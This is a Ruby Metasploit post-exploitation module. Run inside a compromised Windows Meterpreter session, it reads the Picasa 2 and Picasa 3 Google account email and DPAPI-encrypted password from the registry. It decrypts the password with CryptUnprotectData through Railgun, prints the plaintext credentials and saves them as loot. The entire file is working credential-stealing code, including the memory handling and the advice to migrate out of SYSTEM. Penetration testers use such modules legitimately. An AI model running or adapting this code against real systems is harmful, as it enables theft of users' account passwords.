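##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module: pulls the Google account e-mail and DPAPI-protected password
# that Picasa 2 / early Picasa 3 store under HKCU and decrypts the password
# via CryptUnprotectData. DPAPI user-scope blobs only decrypt inside the
# owning user's context, which is why +run+ refuses to continue as SYSTEM.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv
  include Msf::Auxiliary::Report

  # Registry keys holding the 'GaiaEmail' / 'GaiaPass' values, per product
  # generation (Picasa3 entry covers early Picasa 3 builds only).
  PICASA_KEYS = {
    'Picasa 2' => 'HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\',
    'Picasa 3' => 'HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Google Picasa Password Extractor',
        'Description' => %q{
          This module extracts and decrypts the login passwords
          stored by Google Picasa.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_config_getuid
              stdapi_sys_process_attach
              stdapi_sys_process_close
              stdapi_sys_process_get_processes
              stdapi_sys_process_getpid
              stdapi_sys_process_memory_allocate
              stdapi_sys_process_memory_free
              stdapi_sys_process_memory_read
              stdapi_sys_process_memory_write
            ]
          }
        }
      )
    )
  end

  # Makes crypt32 available to Railgun (idempotent).
  def prepare_railgun
    return if session.railgun.get_dll('crypt32')

    session.railgun.add_dll('crypt32')
  end

  # Decrypts a raw DPAPI blob by calling CryptUnprotectData inside the
  # Meterpreter process itself: the blob is copied into our own address space
  # so the DATA_BLOB pointer handed to crypt32 is valid for the callee.
  #
  # @param data [String] raw (hex-decoded) DPAPI blob
  # @return [String] decrypted bytes, or '' when decryption failed / was empty
  def decrypt_password(data)
    return '' if data.nil? || data.empty?

    pid = client.sys.process.getpid
    process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
    mem = nil

    begin
      # Size the buffer to the blob: a fixed 512-byte allocation would be
      # overrun by any larger registry value.
      mem = process.memory.allocate(data.length)
      process.memory.write(mem, data)

      info = session.sys.process.each_process.find { |p| p['pid'] == pid }
      raise "Unable to determine the architecture of PID #{pid}" if info.nil?

      # DATA_BLOB is { DWORD cbData; BYTE *pbData; }. On x64 the pointer is
      # 8-byte aligned, so both fields occupy a 64-bit little-endian slot.
      word, blob_size = info['arch'] == 'x86' ? ['V', 8] : ['Q', 16]
      data_in = [data.length, mem].pack("#{word}2")

      # Second argument (16) is the Railgun out-buffer size for szDataDescr
      # and is unrelated to the blob layout; the last one sizes pDataOut.
      ret = session.railgun.crypt32.CryptUnprotectData(data_in, 16, nil, nil, nil, 0, blob_size)
      unless ret['return']
        print_error("CryptUnprotectData failed (GetLastError=#{ret['GetLastError']})")
        return ''
      end

      len, addr = ret['pDataOut'].unpack("#{word}2")
      return '' if len.nil? || len == 0 || addr.nil? || addr == 0

      decrypted = process.memory.read(addr, len)
      # pbData is LocalAlloc'd by crypt32 and must be released by the caller.
      session.railgun.kernel32.LocalFree(addr)
      decrypted
    ensure
      process.memory.free(mem) if mem
      process.close
    end
  end

  # Reads the e-mail / DPAPI password pair stored under +key+ and decrypts
  # the password.
  #
  # @param key [String] registry key holding 'GaiaEmail' and 'GaiaPass'
  # @param label [String] product name used in status output
  # @return [Array(String, String), nil] [username, password] or nil when
  #   either value is missing or the password did not decrypt
  def extract_picasa_credential(key, label)
    username = registry_getvaldata(key, 'GaiaEmail') || ''
    password = registry_getvaldata(key, 'GaiaPass') || ''
    return nil if username.empty? || password.empty?

    # GaiaPass is the DPAPI blob stored as a hex string.
    pass = decrypt_password([password].pack('H*'))
    return nil if pass.nil? || pass.empty?

    print_status("Found #{label} credentials.")
    print_good("Username: #{username}\t Password: #{pass}")
    [username, pass]
  end

  # Walks every known Picasa key, decrypts what it finds and stores the
  # result as loot. Errors are reported rather than aborting the session.
  def get_registry
    print_status('Looking in registry for stored login passwords by Picasa ...')

    credentials = Rex::Text::Table.new(
      'Header' => 'Picasa Credentials',
      'Indent' => 1,
      'Columns' => ['User', 'Password']
    )

    found = false
    PICASA_KEYS.each do |label, key|
      row = extract_picasa_credential(key, label)
      next unless row

      credentials << row
      found = true
    end

    if found
      path = store_loot(
        'picasa.creds',
        'text/csv',
        session,
        credentials.to_csv,
        'decrypted_picasa_data.csv',
        'Decrypted Picasa Passwords'
      )

      print_status("Decrypted passwords saved in: #{path}")
    else
      print_status('No Picasa credentials found.')
    end
  rescue StandardError => e
    print_error("An error has occurred: #{e}")
  end

  # Entry point. Decryption only works in the context of the user's own
  # account, so running as SYSTEM is rejected with a migration hint.
  def run
    uid = session.sys.config.getuid

    if is_system?
      print_error("This module is running under #{uid}.")
      print_error('Automatic decryption will not be possible.')
      print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')
    else
      prepare_railgun
      get_registry
    end

    print_status('Done')
  end
end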